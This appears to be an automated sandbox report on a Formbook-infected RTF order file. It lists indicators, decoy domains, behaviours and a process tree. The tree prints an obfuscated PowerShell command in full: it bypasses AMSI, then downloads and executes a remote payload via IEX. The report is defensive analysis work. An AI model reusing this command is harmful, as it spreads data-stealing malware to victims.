Analysis

  • max time kernel
    153s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    31-01-2022 09:21

General

  • Target

    Order 669 SOS DEI F.LLI CIRELLI SNC.rtf

  • Size

    2.2MB

  • MD5

    6ec0bc735c8265f7708b78c13255d816

  • SHA1

    e5b9838854f6dbf46a779097084520685941a942

  • SHA256

    d7993d70d7f8a1d66a2a20842331dbe29e0ad8af5fad8a086892fe89878fdfa5

  • SHA512

    e25e7117f0d23f569548d9b2495f2b15791a6e7571b772855fe09e389c2e501359035b5a19053953ccf184c62bb9d031b0ce0d82ac941b6b0d07bdd124cd9ed7

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

g18s

Decoy

compositetwin.com

bevoegd.com

cheesefestbd.com

gunddaisue.xyz

feiprotocolrewards.com

investmentpassion-2.biz

burnoutttt.com

violetberomunster.online

amrxbar.com

winnersrecycling.com

jlhxfdc.com

cubeobscura.com

iumgbl.com

gaptoy.link

imibimba.com

jklhs7gl.xyz

kaileaoutdoors.com

apartment35205.com

zeitung474.rest

andsourcing.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Order 669 SOS DEI F.LLI CIRELLI SNC.rtf"
      2⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1964
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\SysWOW64\rundll32.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1480
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\WINDOWS\syswow64\calc.exe"
          3⤵
            PID:1308
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:436
        • C:\Windows\SysWOW64\CmD.exe
          CmD.exe /C cscript %tmp%\Client.vbs A C
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:992
          • C:\Windows\SysWOW64\cscript.exe
            cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs A C
            3⤵
              PID:1444
        • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
          Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$768688854999485858594993883845=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,53,51,49,53,51,97,98,51,54,52,55,48,57,53,99,51,53,100,52,99,50,56,54,55,99,48,53,55,48,102,50,97,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($768688854999485858594993883845)|I`E`X
          1⤵
          • Process spawned unexpected child process
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:972
          • C:\WINDOWS\syswow64\calc.exe
            "{Path}"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:1544

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Exploitation for Client Execution

        1
        T1203

        Defense Evasion

        Modify Registry

        1
        T1112

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Client.vbs
          MD5

          a61002c5ffb9c13b2c80f8e900ea40f5

          SHA1

          7b76f36959a6a33f5879b8d53ca45af305cb3042

          SHA256

          aa9d01ba8b4936b80f88646a5a5aa510a18d6c939a0b7a9a13978994a7addc64

          SHA512

          7bfe1b72ddee4ff0a3d4c2092e0d4f7d2231e88ea3dd5f2f139304f1ad5bfb658fd16056db08c57aff683e43e35d28570a3fa233f67f0cfc55fe24a83232bb30

        • memory/972-70-0x000000000284E000-0x000000000284F000-memory.dmp
          Filesize

          4KB

        • memory/972-61-0x000007FEFC2B1000-0x000007FEFC2B3000-memory.dmp
          Filesize

          8KB

        • memory/972-72-0x0000000002854000-0x0000000002855000-memory.dmp
          Filesize

          4KB

        • memory/972-69-0x0000000002851000-0x0000000002852000-memory.dmp
          Filesize

          4KB

        • memory/972-71-0x000000000284F000-0x0000000002850000-memory.dmp
          Filesize

          4KB

        • memory/972-62-0x000007FEF3480000-0x000007FEF3FDD000-memory.dmp
          Filesize

          11.4MB

        • memory/972-65-0x0000000002824000-0x0000000002827000-memory.dmp
          Filesize

          12KB

        • memory/972-66-0x000000000282B000-0x000000000284A000-memory.dmp
          Filesize

          124KB

        • memory/972-64-0x0000000002822000-0x0000000002824000-memory.dmp
          Filesize

          8KB

        • memory/972-63-0x0000000002820000-0x0000000002822000-memory.dmp
          Filesize

          8KB

        • memory/972-68-0x0000000002852000-0x0000000002854000-memory.dmp
          Filesize

          8KB

        • memory/1224-88-0x000007FE95F60000-0x000007FE95F6A000-memory.dmp
          Filesize

          40KB

        • memory/1224-87-0x000007FEF6A30000-0x000007FEF6B73000-memory.dmp
          Filesize

          1.3MB

        • memory/1224-85-0x00000000050E0000-0x0000000005248000-memory.dmp
          Filesize

          1.4MB

        • memory/1224-79-0x0000000004E20000-0x0000000004F5B000-memory.dmp
          Filesize

          1.2MB

        • memory/1480-83-0x0000000002110000-0x0000000002413000-memory.dmp
          Filesize

          3.0MB

        • memory/1480-84-0x0000000000A10000-0x0000000000AA3000-memory.dmp
          Filesize

          588KB

        • memory/1480-81-0x0000000000D00000-0x0000000000D0E000-memory.dmp
          Filesize

          56KB

        • memory/1480-82-0x00000000000F0000-0x000000000011F000-memory.dmp
          Filesize

          188KB

        • memory/1544-75-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/1544-73-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/1544-78-0x0000000000110000-0x0000000000124000-memory.dmp
          Filesize

          80KB

        • memory/1544-77-0x0000000000940000-0x0000000000C43000-memory.dmp
          Filesize

          3.0MB

        • memory/1544-74-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/1648-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1648-54-0x0000000072DA1000-0x0000000072DA4000-memory.dmp
          Filesize

          12KB

        • memory/1648-86-0x000000005FFF0000-0x0000000060000000-memory.dmp
          Filesize

          64KB

        • memory/1648-57-0x0000000076451000-0x0000000076453000-memory.dmp
          Filesize

          8KB

        • memory/1648-55-0x0000000070821000-0x0000000070823000-memory.dmp
          Filesize

          8KB